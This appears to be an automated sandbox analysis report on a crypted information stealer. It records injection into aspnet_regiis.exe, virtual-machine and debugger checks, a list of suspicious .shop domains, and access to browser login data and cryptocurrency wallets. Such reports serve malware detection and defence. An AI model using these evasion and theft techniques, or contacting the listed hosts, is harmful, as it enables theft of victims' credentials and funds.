                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Armanivenntii_crypted_EASY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Armanivenntii_crypted_EASY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: d3d9x.dll.0.drStatic PE information: section name: ./Wm
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDE2F71 push ecx; ret 0_2_6CDE2F84
                Source: Armanivenntii_crypted_EASY.exeStatic PE information: section name: .text entropy: 6.970733999325173
                Source: d3d9x.dll.0.drStatic PE information: section name: .text entropy: 6.84152168311668
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeFile created: C:\Users\user\AppData\Roaming\d3d9x.dllJump to dropped file
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: 52E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: 62E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: 6410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: 7410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9x.dllJump to dropped file
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeAPI coverage: 9.2 %
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe TID: 7400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7428Thread sleep time: -330000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: Amcache.hve.8.drBinary or memory string: VMware
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002B7B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_2-11517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00433420 LdrInitializeThunk,2_2_00433420
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDD7CC1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDD7CC1
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDD7CC1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDD7CC1
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDDBCF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDDBCF5
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDD76D1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CDD76D1
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: weiggheticulop.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: consciousourwi.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: southedhiscuso.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: deicedosmzj.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: cagedwifedsozm.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: charecteristicdxp.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: interactiedovspm.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: potentioallykeos.shop
                Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: weaknessmznxo.shop
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 437000Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 43A000Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 449000Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27DD008Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDD7EB9 cpuid 0_2_6CDD7EB9
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeQueries volume information: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exeCode function: 0_2_6CDD790A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CDD790A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: aspnet_regiis.exe, 00000002.00000003.2050153954.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2063946483.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310194741.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2050132649.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049666469.0000000002C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7408, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum@
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
                Source: aspnet_regiis.exe, 00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
